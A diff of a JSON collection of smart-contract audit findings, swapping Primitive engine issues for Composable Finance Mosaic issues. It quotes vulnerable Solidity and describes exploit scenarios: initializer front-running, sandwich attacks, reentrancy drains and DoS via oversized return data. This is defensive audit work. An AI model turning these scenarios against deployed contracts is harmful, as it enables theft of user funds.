Recommendations Short term, verify that the variable returned by NormalizeExact has at least one element before indexing it. Long term, review the codebase for instances in which data is indexed without undergoing a length check; handling untrusted data in this way may lead to a more severe DoS. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: Undetermined" ] }, { - "title": "3. Anyone could steal pool tokens earned interest ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "If a PrimitiveEngine contract is deployed with certain ERC20 tokens, unexpected token interest behavior could allow token interest to count toward the number of tokens required for the deposit , allocate , create , and swap functions, allowing the user to avoid paying in full. Liquidity providers use the deposit function to increase the liquidity in a position. The following code within the function verifies that the pool has received at least the minimum number of tokens required by the protocol: if (delRisky != 0 ) balRisky = balanceRisky(); if (delStable != 0 ) balStable = balanceStable(); IPrimitiveDepositCallback( msg.sender ).depositCallback(delRisky, delStable, data); // agnostic payment if (delRisky != 0 ) checkRiskyBalance(balRisky + delRisky); if (delStable != 0 ) checkStableBalance(balStable + delStable); emit Deposit( msg.sender , recipient, delRisky, delStable); Figure 3.1: rmm-core/contracts/PrimitiveEngine.sol#213-217 Assume that both delRisky and delStable are positive. First, the code fetches the current balances of the tokens.
Next, the depositCallback function is called to transfer the required number of each token to the pool contract. Finally, the code verifies that each token's balance has increased by at least the required amount. There could be a token that allows token holders to earn interest simply because they are token holders. To retrieve this interest, token holders could call a certain function to calculate the interest earned and increase their balances. An attacker could call this function from within the depositCallback function to pay out interest to the pool contract. This would increase the pool's token balance, decreasing the number of tokens that the user needs to transfer to the pool contract to pass the balance check (i.e., the check confirming that the balance has sufficiently increased). In effect, the user's token payment obligation is reduced because the interest accounts for part of the required balance increase. To date, we have not identified a token contract that contains such functionality; however, it is possible that one exists or could be created. Exploit Scenario Bob deploys a PrimitiveEngine contract with token1 and token2. Token1 allows its holders to earn passive interest. Anyone can call get_interest(address) to make a certain token holder's interest be claimed and added to the token holder's balance. Over time, the pool can claim 1,000 tokens. Eve calls deposit , and the pool requires Eve to send 1,000 tokens. Eve calls get_interest(address) in the depositCallback function instead of sending the tokens, depositing to the pool without paying the minimum required tokens. Recommendations Short term, add documentation explaining to users that the use of interest-earning tokens can reduce the standard payments for deposit , allocate , create , and swap . Long term, using the Token Integration Checklist (appendix C), generate a document detailing the shortcomings of tokens with certain features and the impacts of their use in the Primitive protocol. That way, users will not be alarmed if the use of a token with nonstandard features leads to unexpected results.", + "title": "1. Initialization functions can be front-run ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The CrosslayerPortal contracts have initializer functions that can be front-run, allowing an attacker to incorrectly initialize the contracts. Due to the use of the delegatecall proxy pattern, these contracts cannot be initialized with their own constructors, and they have initializer functions: function initialize() public initializer { __Ownable_init(); __Pausable_init(); __ReentrancyGuard_init(); } Figure 1.1: The initialize function in MsgSender:126-130 An attacker could front-run these functions and initialize the contracts with malicious values.
This issue affects the following system contracts: contracts/core/BridgeAggregator contracts/core/InvestmentStrategyBase contracts/core/MosaicHolding contracts/core/MosaicVault contracts/core/MosaicVaultConfig contracts/core/functionCalls/MsgReceiverFactory contracts/core/functionCalls/MsgSender contracts/nfts/Summoner contracts/protocols/aave/AaveInvestmentStrategy contracts/protocols/balancer/BalancerV1Wrapper contracts/protocols/balancer/BalancerVaultV2Wrapper contracts/protocols/bancor/BancorWrapper contracts/protocols/compound/CompoundInvestmentStrategy contracts/protocols/curve/CurveWrapper contracts/protocols/gmx/GmxWrapper contracts/protocols/sushiswap/SushiswapLiquidityProvider contracts/protocols/synapse/ISynapseSwap contracts/protocols/synapse/SynapseWrapper contracts/protocols/uniswap/IUniswapV2Pair contracts/protocols/uniswap/UniswapV2Wrapper contracts/protocols/uniswap/UniswapWrapper Exploit Scenario Bob deploys the MsgSender contract. Eve front-runs the contract's initialization and sets her own address as the owner address. As a result, she can use the initialize function to update the contract's variables, modifying the system parameters. Recommendations Short term, to prevent front-running of the initializer functions, use hardhat-deploy to initialize the contracts or replace the functions with constructors. Alternatively, create a deployment script that will emit sufficient errors when an initialize call fails. Long term, carefully review the Solidity documentation, especially the Warnings section, as well as the pitfalls of using the delegatecall proxy pattern.", "labels": [ "Trail of Bits", "Severity: High", "Difficulty: High" ] }, { - "title": "4. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The Primitive contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the Primitive contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "title": "2. Trades are vulnerable to sandwich attacks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The swapToNative function does not allow users to specify the minAmountOut parameter of swapExactTokensForETH , which indicates the minimum amount of ETH that a user will receive from a trade. Instead, the value is hard-coded to zero, meaning that there is no guarantee that users will receive any ETH in exchange for their tokens. By using a bot to sandwich a user's trade, an attacker could increase the slippage incurred by the user and profit off of the spread at the user's expense. The minAmountOut parameter is meant to prevent the execution of trades through illiquid pools and to provide protection against sandwich attacks. The current implementation lacks protections against high slippage and may cause users to lose funds. This applies to the AVAX version, too. Composable Finance indicated that only the relayer will call this function, but the function lacks access controls to prevent users from calling it directly. Importantly, it is highly likely that if a relayer does not implement proper protections, all of its trades will suffer from high slippage, as they will represent pure-profit opportunities for sandwich bots. uint256 [] memory amounts = swapRouter.swapExactTokensForETH( _amount, 0 , path, _to, deadline ); Figure 2.1: Part of the swapToNative function in MosaicNativeSwapperETH.sol:44-50 Exploit Scenario Bob, a relayer, makes a trade on behalf of a user. The minAmountOut value is set to zero, which means that the trade can be executed at any price. As a result, when Eve sandwiches the trade with a buy and sell order, Bob sells the tokens without purchasing any, effectively giving away tokens for free.
Recommendations Short term, allow users (relayers) to input a slippage tolerance, and add access controls to the swapToNative function. Long term, consider the risks of integrating with other protocols such as Uniswap and implement mitigations for those risks.", "labels": [ "Trail of Bits", "Severity: High", "Difficulty: Medium" ] }, { - "title": "5. Lack of zero-value checks on functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. function deposit( address recipient, uint256 delRisky, uint256 delStable, bytes calldata data ) external override lock { if (delRisky == 0 && delStable == 0 ) revert ZeroDeltasError(); margins[recipient].deposit(delRisky, delStable); // state update uint256 balRisky; uint256 balStable; if (delRisky != 0 ) balRisky = balanceRisky(); if (delStable != 0 ) balStable = balanceStable(); IPrimitiveDepositCallback( msg.sender ).depositCallback(delRisky, delStable, data); // agnostic payment if (delRisky != 0 ) checkRiskyBalance(balRisky + delRisky); if (delStable != 0 ) checkStableBalance(balStable + delStable); emit Deposit( msg.sender , recipient, delRisky, delStable); } Figure 5.1: rmm-core/contracts/PrimitiveEngine.sol#L201-L219 Among others, the following functions lack zero-value checks on their arguments: PrimitiveEngine.deposit PrimitiveEngine.withdraw PrimitiveEngine.allocate PrimitiveEngine.swap PositionDescriptor.constructor MarginManager.deposit MarginManager.withdraw SwapManager.swap CashManager.unwrap CashManager.sweepToken Exploit Scenario Alice, a user, mistakenly provides the zero address as an argument when depositing for a recipient. As a result, her funds are saved in the margins of the zero address instead of a different address. Recommendations Short term, add zero-value checks for all function arguments to ensure that users cannot mistakenly set incorrect values, misconfiguring the system. Long term, use Slither, which will catch functions that do not have zero-value checks.", + "title": "3. forwardCall creates a denial-of-service attack vector ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Low-level external calls can exhaust all available gas by returning an excessive amount of data, thereby causing the relayer to incur memory expansion costs. This can be used to cause an out-of-gas exception and is a denial-of-service (DoS) attack vector. Since arbitrary contracts can be called, Composable Finance should implement additional safeguards. If an out-of-gas exception occurs, the message will never be marked as forwarded ( forwarded[id] = true ). If the relayer repeatedly retries the transaction, assuming it will eventually be marked as forwarded, the queue of pending transactions will grow without bounds, with each unsuccessful message-forwarding attempt carrying a gas cost. The approveERC20TokenAndForwardCall function is also vulnerable to this DoS attack. (success, returnData) = _contract. call {value: msg.value }(_data); require (success, \"Failed to forward function call\" ); uint256 balance = IERC20(_feeToken).balanceOf( address ( this )); require ( balance >= _feeAmount, \"Not enough tokens for the fee\" ); forwarded[_id] = true ; Figure 3.1: Part of the forwardCall function in MsgReceiver:79-85 Exploit Scenario Eve deploys a contract that returns 10 million bytes of data. A call to that contract causes an out-of-gas exception.
Since the transaction is not marked as forwarded, the relayer continues to propagate the transaction without success. This results in excessive resource consumption and a degraded quality of service. Recommendations Short term, require that the size of return data be fixed to 32 bytes. Long term, review the documentation on low-level Solidity calls and EVM edge cases. References Excessively Safe Call", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", "Difficulty: Medium" ] }, { - "title": "5. Lack of zero-value checks on functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. function deposit( address recipient, uint256 delRisky, uint256 delStable, bytes calldata data ) external override lock { if (delRisky == 0 && delStable == 0 ) revert ZeroDeltasError(); margins[recipient].deposit(delRisky, delStable); // state update uint256 balRisky; uint256 balStable; if (delRisky != 0 ) balRisky = balanceRisky(); if (delStable != 0 ) balStable = balanceStable(); IPrimitiveDepositCallback( msg.sender ).depositCallback(delRisky, delStable, data); // agnostic payment if (delRisky != 0 ) checkRiskyBalance(balRisky + delRisky); if (delStable != 0 ) checkStableBalance(balStable + delStable); emit Deposit( msg.sender , recipient, delRisky, delStable); } Figure 5.1: rmm-core/contracts/PrimitiveEngine.sol#L201-L219 Among others, the following functions lack zero-value checks on their arguments: PrimitiveEngine.deposit PrimitiveEngine.withdraw PrimitiveEngine.allocate PrimitiveEngine.swap PositionDescriptor.constructor MarginManager.deposit MarginManager.withdraw SwapManager.swap CashManager.unwrap CashManager.sweepToken Exploit Scenario Alice, a user, mistakenly provides the zero address as an argument when depositing for a recipient. As a result, her funds are saved in the margins of the zero address instead of a dierent address. Recommendations Short term, add zero-value checks for all function arguments to ensure that users cannot mistakenly set incorrect values, misconguring the system. Long term, use Slither, which will catch functions that do not have zero-value checks.", + "title": "8. Lack of two-step process for contract ownership changes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The owner of a contract in the Composable Finance ecosystem can be changed through a call to the transferOwnership function. This function internally calls the setOwner function, which immediately sets the contract's new owner. Making such a critical change in a single step is error-prone and can lead to irrevocable mistakes. /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership () public virtual onlyOwner { _setOwner( address ( 0 )); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. 
*/ function transferOwnership ( address newOwner ) public virtual onlyOwner { require (newOwner != address ( 0 ), \"Ownable: new owner is the zero address\" ); _setOwner(newOwner); } function _setOwner ( address newOwner ) private { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } Figure 8.1: OpenZeppelin's OwnableUpgradeable contract Exploit Scenario Bob, a Composable Finance developer, invokes transferOwnership() to change the address of an existing contract's owner but accidentally enters the wrong address. As a result, he permanently loses access to the contract. Recommendations Short term, perform ownership transfers through a two-step process in which the owner proposes a new address and the transfer is completed once the new address has executed a call to accept the role. Long term, identify and document all possible actions that can be taken by privileged accounts and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "9. sendFunds is vulnerable to reentrancy by owners ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The sendFunds function is vulnerable to reentrancy and can be used by the owner of a token contract to drain the contract of its funds. Specifically, because fundsTransfered[user] is written to after a call to an external contract, the contract's owner could input his or her own address and reenter the sendFunds function to drain the contract's funds. An owner could send funds to him- or herself without using the reentrancy, but there is no reason to leave this vulnerability in the code. Additionally, the FundKeeper contract can send funds to any user by calling setAmountToSend and then sendFunds . It is unclear why amountToSend is not changed (set to zero) after a successful transfer. It would make more sense to call setAmountToSend after each transfer and to store users' balances in a mapping. function setAmountToSend ( uint256 amount ) external onlyOwner { amountToSend = amount; emit NewAmountToSend(amount); } function sendFunds ( address user ) external onlyOwner { require (!fundsTransfered[user], \"reward already sent\" ); require ( address ( this ).balance >= amountToSend, \"Contract balance low\" ); // solhint-disable-next-line avoid-low-level-calls ( bool sent , ) = user.call{value: amountToSend}( \"\" ); require (sent, \"Failed to send Polygon\" ); fundsTransfered[user] = true ; emit FundSent(amountToSend, user); } Figure 9.1: Part of the sendFunds function in FundKeeper.sol:23-38 Exploit Scenario Eve's smart contract is the owner of the FundKeeper contract. Eve's contract executes a transfer for which Eve should receive only 1 ETH. Instead, because the user address is a contract with a fallback function, Eve can reenter the sendFunds function and drain all ETH from the contract. Recommendations Short term, set fundsTransfered[user] to true prior to making external calls. Long term, store each user's balance in a mapping to ensure that users cannot make withdrawals that exceed their balances. Additionally, follow the checks-effects-interactions pattern.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + },
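Under that recommendation, a minimal sketch of the reordered function (same logic as figure 9.1, with the state update moved before the external call):
function sendFunds ( address user ) external onlyOwner {
    require (!fundsTransfered[user], \"reward already sent\" );
    require ( address ( this ).balance >= amountToSend, \"Contract balance low\" );
    fundsTransfered[user] = true; // effect recorded before the interaction, closing the reentrancy window
    ( bool sent , ) = user.call{value: amountToSend}( \"\" );
    require (sent, \"Failed to send Polygon\" );
    emit FundSent(amountToSend, user);
}
+ { + "title": "20. 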
MosaicVault and MosaicHolding owner has excessive privileges ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The owner of the MosaicVault and MosaicHolding contracts has too many privileges across the system. Compromise of the owner's private key would put the integrity of the underlying system at risk. The owner of the MosaicVault and MosaicHolding contracts can perform the following privileged operations in the context of the contracts: Rescuing funds if the system is compromised Managing withdrawals, transfers, and fee payments Pausing and unpausing the contracts Rebalancing liquidity across chains Investing in one or more investment strategies Claiming rewards from one or more investment strategies The ability to drain funds, manage liquidity, and claim rewards creates a single point of failure. It increases the likelihood that the contract's owner will be targeted by an attacker and increases the incentives for the owner to act maliciously. Exploit Scenario Alice, the owner of MosaicVault and MosaicHolding , deploys the contracts. MosaicHolding eventually holds assets worth USD 20 million. Eve gains access to Alice's machine, upgrades the implementations, pauses MosaicHolding , and drains all funds from the contract. Recommendations Short term, clearly document the functions and implementations that the owner of the MosaicVault and MosaicHolding contracts can change. Additionally, split the privileges provided to the owner across multiple roles (e.g., a fund manager, fund rescuer, owner, etc.) to ensure that no one address has excessive control over the system. Long term, develop user documentation on all risks associated with the system, including those associated with privileged users and the existence of a single point of failure.", + "labels": [ + "Trail of Bits", + "Severity: High", "Difficulty: High" ] }, { - "title": "6. uint256.percentage() and int256.percentage() are not inverses of each other ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The Units library provides two percentage helper functions to convert unsigned integers to signed 64x64 xed-point values, and vice versa. Due to rounding errors, these functions are not direct inverses of each other. /// @notice Converts denormalized percentage integer to a fixed point 64.64 number /// @dev Convert unsigned 256-bit integer number into signed 64.64 fixed point number /// @param denorm Unsigned percentage integer with precision of 1e4 /// @return Signed 64.64 fixed point percentage with precision of 1e4 function percentage( uint256 denorm) internal pure returns ( int128 ) { return denorm. divu (PERCENTAGE); } /// @notice Converts signed 64.64 fixed point percentage to a denormalized percetage integer /// @param denorm Signed 64.64 fixed point percentage /// @return Unsigned percentage denormalized with precision of 1e4 function percentage( int128 denorm) internal pure returns ( uint256 ) { return denorm. mulu (PERCENTAGE); } Figure 6.1: rmm-core/contracts/libraries/Units.sol#L53-L66 These two functions use ABDKMath64x64.divu() and ABDKMath64x64.mulu() , which both round downward toward zero. 
As a result, if a uint256 value is converted to a signed 64x64 xed point and then converted back to a uint256 value, the result will not equal the original uint256 value: function scalePercentages (uint256 value ) public { require(value > Units.PERCENTAGE); int128 signedPercentage = value.percentage(); uint256 unsignedPercentage = signedPercentage.percentage(); if(unsignedPercentage != value) { emit AssertionFailed( \"scalePercentages\" , signedPercentage, unsignedPercentage); assert(false); } Figure 6.2: rmm-core/contracts/LibraryMathEchidna.sol#L48-L57 used Echidna to determine this property violation: Analyzing contract: /rmm-core/contracts/LibraryMathEchidna.sol:LibraryMathEchidna scalePercentages(uint256): failed! Call sequence: scalePercentages(10006) Event sequence: Panic(1), AssertionFailed(\"scalePercentages\", 18457812120153777346, 10005) Figure 6.3: Echidna results Exploit Scenario 1. uint256.percentage() 10006.percentage() = 1.0006 , which truncates down to 1. 2. int128.percentage() 1.percentage() = 10000 . 3. The assertion fails because 10006 != 10000 . Recommendations Short term, either remove the int128.percentage() function if it is unused in the system or ensure that the percentages round in the correct direction to minimize rounding errors. Long term, use Echidna to test system and mathematical invariants.", + "title": "24. SushiswapLiquidityProvider deposits cannot be used to cover withdrawal requests ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Withdrawal requests that require the removal of liquidity from a Sushiswap liquidity pool will revert and cause a system failure. When a user requests a withdrawal of liquidity from the Mosaic system, MosaicVault (via the coverWithdrawRequest() function) queries MosaicHolding to see whether liquidity must be removed from an investment strategy to cover the withdrawal amount (figure 24.1). function _withdraw ( address _accountTo , uint256 _amount , address _tokenIn , address _tokenOut , uint256 _amountOutMin , WithdrawData calldata _withdrawData, bytes calldata _data ) internal onlyWhitelistedToken(_tokenIn) validAddress(_tokenOut) nonReentrant onlyOwnerOrRelayer whenNotPaused returns ( uint256 withdrawAmount ) { IMosaicHolding mosaicHolding = IMosaicHolding(vaultConfig.getMosaicHolding()); require (hasBeenWithdrawn[_withdrawData.id] == false , \"ERR: ALREADY WITHDRAWN\" ); if (_tokenOut == _tokenIn) { require ( mosaicHolding.getTokenLiquidity(_tokenIn, _withdrawData.investmentStrategies) >= _amount, \"ERR: VAULT BAL\" ); } [...] mosaicHolding.coverWithdrawRequest( _withdrawData.investmentStrategies, _tokenIn, withdrawAmount ); [...] } Figure 24.1: The _withdraw function in MosaicVault:404-474 If MosaicHolding's balance of the token being withdrawn ( _tokenIn ) is not sufficient to cover the withdrawal, MosaicHolding will iterate through each investment strategy in the _investmentStrategy array and remove enough _tokenIn to cover it. To remove liquidity from an investment strategy, it calls withdrawInvestment() on that strategy (figure 24.2). 
function coverWithdrawRequest ( address [] calldata _investmentStrategies, address _token , uint256 _amount ) external override { require (hasRole(MOSAIC_VAULT, msg.sender ), \"ERR: PERMISSIONS A-V\" ); uint256 balance = IERC20(_token).balanceOf( address ( this )); if (balance >= _amount) return ; uint256 requiredAmount = _amount - balance; uint8 index ; while (requiredAmount > 0 ) { address strategy = _investmentStrategies[index]; IInvestmentStrategy investment = IInvestmentStrategy(strategy); uint256 investmentAmount = investment.investmentAmount(_token); uint256 amountToWithdraw = 0 ; if (investmentAmount >= requiredAmount) { amountToWithdraw = requiredAmount; requiredAmount = 0 ; } else { amountToWithdraw = investmentAmount; requiredAmount = requiredAmount - investmentAmount; } IInvestmentStrategy.Investment[] memory investments = new IInvestmentStrategy.Investment[]( 1 ); investments[ 0 ] = IInvestmentStrategy.Investment(_token, amountToWithdraw); IInvestmentStrategy(investment).withdrawInvestment(investments, \"\" ); emit InvestmentWithdrawn(strategy, msg.sender ); index++; } require (IERC20(_token).balanceOf( address ( this )) >= _amount, \"ERR: VAULT BAL\" ); } Figure 24.2: The coverWithdrawRequest function in MosaicHolding:217-251 This process works for an investment strategy in which the investments array function argument has a length of 1. However, in the case of SushiswapLiquidityProvider , the withdrawInvestment() function expects the investments array to have a length of 2 (figure 24.3). function withdrawInvestment (Investment[] calldata _investments, bytes calldata _data) external override onlyInvestor nonReentrant { Investment memory investmentA = _investments[ 0 ]; Investment memory investmentB = _investments[ 1 ]; ( uint256 deadline , uint256 liquidity ) = abi.decode(_data, ( uint256 , uint256 )); IERC20Upgradeable pair = IERC20Upgradeable(getPair(investmentA.token, investmentB.token)); pair.safeIncreaseAllowance( address (sushiSwapRouter), liquidity); ( uint256 amountA , uint256 amountB ) = sushiSwapRouter.removeLiquidity( investmentA.token, investmentB.token, liquidity, investmentA.amount, investmentB.amount, address ( this ), deadline ); IERC20Upgradeable(investmentA.token).safeTransfer(mosaicHolding, amountA); IERC20Upgradeable(investmentB.token).safeTransfer(mosaicHolding, amountB); } Figure 24.3: The withdrawInvestment function in SushiswapLiquidityProvider:90-113 Thus, any withdrawal request that requires the removal of liquidity from SushiswapLiquidityProvider will revert. Exploit Scenario Alice wishes to withdraw liquidity ( tokenA ) that she deposited into the Mosaic system. The MosaicHolding contract does not hold enough tokenA to cover the withdrawal and thus tries to withdraw tokenA from the SushiswapLiquidityProvider investment strategy. The request reverts, and Alice's withdrawal request fails, leaving her unable to access her funds. Recommendations Short term, avoid depositing user liquidity into the SushiswapLiquidityProvider investment strategy. Long term, take the following steps: Identify and implement one or more data structures that will reduce the technical debt resulting from the use of the InvestmentStrategy interface. Develop a more effective solution for covering withdrawals that does not consistently require withdrawing funds from other investment strategies.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: High", + "Difficulty: High" + ] + },
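Regarding finding 24 above, a minimal defensive sketch (illustrative) that would make the arity mismatch fail with an explicit error instead of an out-of-bounds revert:
function withdrawInvestment (Investment[] calldata _investments, bytes calldata _data) external override onlyInvestor nonReentrant {
    // Sushiswap positions are token pairs, so exactly two entries are required.
    require(_investments.length == 2, \"SushiswapLiquidityProvider: expected a token pair\");
    // ... remove liquidity as in figure 24.3 ...
}
+ { + "title": "26. 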
MosaicVault and MosaicHolding owner is controlled by a single private key ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The MosaicVault and MosaicHolding contracts manage many critical functionalities, such as those for rescuing funds, managing liquidity, and claiming rewards. The owner of these contracts is a single externally owned account (EOA). As mentioned in TOB-CMP-20 , this creates a single point of failure. Moreover, it makes the owner a high-value target for attackers and increases the incentives for the owner to act maliciously. If the private key is compromised, the system will be compromised too. Exploit Scenario Alice, the owner of the MosaicVault and MosaicHolding contracts, deploys the contracts. MosaicHolding eventually holds assets worth USD 20 million. Eve gains access to Alice's machine, upgrades the implementations, pauses MosaicHolding , and drains all funds from the contract. Recommendations Short term, change the owner of the contracts from a single EOA to a multi-signature account. Long term, take the following steps: Develop user documentation on all risks associated with the system, including those associated with privileged users and the existence of a single point of failure. Assess the system's key management infrastructure and document the associated risks as well as an incident response plan.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "27. The relayer is a single point of failure ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Because the relayer is a centralized service that is responsible for critical functionalities, it constitutes a single point of failure within the Mosaic ecosystem. The relayer is responsible for the following tasks: Managing withdrawals across chains Managing transfers across chains Managing the accrued interest on all users' investments Executing cross-chain message call requests Collecting fees for all withdrawals, transfers, and cross-chain message calls Refunding fees in case of failed transfers or withdrawals The centralized design and importance of the relayer increase the likelihood that the relayer will be targeted by an attacker. Exploit Scenario Eve, an attacker, is able to gain root access on the server that runs the relayer. Eve can then shut down the Mosaic system by stopping the relayer service. Eve can also change the source code to trigger behavior that can lead to the drainage of funds. Recommendations Short term, document an incident response plan and monitor exposed ports and services that may be vulnerable to exploitation. Long term, arrange an external security audit of the core and peripheral relayer source code. Additionally, consider implementing a decentralized relayer architecture more resistant to system takeovers.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "4. Project dependencies contain vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Although dependency scans did not yield a direct threat to the project under review, npm and yarn audit identified dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure dependencies are not malicious. 
Problems with dependencies in the JavaScript community could have a significant effect on the repositories under review. The output below details these issues. CVE ID", + "labels": [ + "Trail of Bits", + "Severity: Medium", "Difficulty: Low" ] }, { - "title": "7. Users can allocate tokens to a pool at the moment the pool reaches maturity ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "Users can allocate tokens to a pool at the moment the pool reaches maturity, which creates an opportunity for attackers to front-run or update the curve right before the maturity period ends. function allocate ( bytes32 poolId , address recipient , uint256 delRisky , uint256 delStable , bool fromMargin , bytes calldata data ) external override lock returns ( uint256 delLiquidity ) { if (delRisky == 0 || delStable == 0 ) revert ZeroDeltasError(); Reserve.Data storage reserve = reserves[poolId]; if (reserve.blockTimestamp == 0 ) revert UninitializedError(); uint32 timestamp = _blockTimestamp(); if (timestamp > calibrations[poolId].maturity) revert PoolExpiredError(); uint256 liquidity0 = (delRisky * reserve.liquidity) / uint256 (reserve.reserveRisky); uint256 liquidity1 = (delStable * reserve.liquidity) / uint256 (reserve.reserveStable); delLiquidity = liquidity0 < liquidity1 ? liquidity0 : liquidity1; if (delLiquidity == 0 ) revert ZeroLiquidityError(); liquidity[recipient][poolId] += delLiquidity; // increase position liquidity reserve.allocate(delRisky, delStable, delLiquidity, timestamp); // increase reserves and liquidity if (fromMargin) { margins.withdraw(delRisky, delStable); // removes tokens from `msg.sender` margin account } else { ( uint256 balRisky , uint256 balStable ) = (balanceRisky(), balanceStable()); IPrimitiveLiquidityCallback( msg.sender ).allocateCallback(delRisky, delStable, data); // agnostic payment checkRiskyBalance(balRisky + delRisky); checkStableBalance(balStable + delStable); } emit Allocate( msg.sender , recipient, poolId, delRisky, delStable); } Figure 7.1: rmm-core/contracts/PrimitiveEngine.sol#L236-L268 Recommendations Short term, document the expected behavior of transactions to allocate funds into a pool that has just reached maturity and analyze the front-running risk. Long term, analyze all front-running risks on all transactions in the system.", + "title": "10. DoS risk created by cross-chain message call requests on certain networks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "Cross-chain message calls that are requested on a low-fee, low-latency network could facilitate a DoS, preventing other users from interacting with the system. If a user, through the MsgSender contract, sent numerous cross-chain message call requests, the relayer would have to act upon the emitted events regardless of whether they were legitimate or part of a DoS attack. Exploit Scenario Eve creates a theoretically infinite series of transactions on Arbitrum, a low-fee, low-latency network. The internal queue of the relayer is then filled with numerous malicious transactions. Alice requests a cross-chain message call; however, because the relayer must handle many of Eve's transactions first, Alice has to wait an undefined amount of time for her transaction to be executed. Recommendations Short term, create multiple queues that work across the various chains to mitigate this DoS risk. 
Long term, analyze the implications of the ability to create numerous message calls on low-fee networks and its impact on relayer performance.", "labels": [ "Trail of Bits", - "Severity: Undetermined", + "Severity: Medium", "Difficulty: Medium" ] }, { - "title": "8. Possible front-running vulnerability during BUFFER time ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Primitive.pdf", - "body": "The PrimitiveEngine.swap function permits swap transactions until 120 seconds after maturity, which could enable miners to front-run swap transactions and engage in malicious behavior. The constant tau value may allow miners to prot from front-running transactions when the swap curve is locked after maturity. SwapDetails memory details = SwapDetails({ recipient: recipient, poolId: poolId, deltaIn: deltaIn, deltaOut: deltaOut, riskyForStable: riskyForStable, fromMargin: fromMargin, toMargin: toMargin, timestamp: _blockTimestamp() }); uint32 lastTimestamp = _updateLastTimestamp(details.poolId); // updates lastTimestamp of `poolId` if (details.timestamp > lastTimestamp + BUFFER) revert PoolExpiredError(); // 120s buffer to allow final swaps Figure 8.1: rmm-core/contracts/PrimitiveEngine.sol#L314-L326 Recommendations Short term, perform an o-chain analysis on the curve and the swaps to determine the impact of a front-running attack on these transactions. Long term, perform an additional economic analysis with historical data on pools to determine the impact of front-running attacks on all functionality in the system.", + "title": "12. Unimplemented getAmountsOut function in Balancer V2 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", + "body": "The getAmountsOut function in the BalancerV2Wrapper contract is unimplemented. The purpose of the getAmountsOut() function, shown in figure 12.1, is to allow users to know the amount of funds they will receive when executing a swap. Because the function does not invoke any functions on the Balancer Vault, a user must actually perform a swap to determine the amount of funds he or she will receive: function getAmountsOut ( address , address , uint256 , bytes calldata ) external pure override returns ( uint256 ) { return 0 ; } Figure 12.1: The getAmountsOut function in BalancerVaultV2Wrapper:43-50 Exploit Scenario Alice, a user of the Composable Finance vaults, wants to swap 100 USDC for DAI on Balancer. Because the getAmountsOut function is not implemented, she is unable to determine how much DAI she will receive before executing the swap. 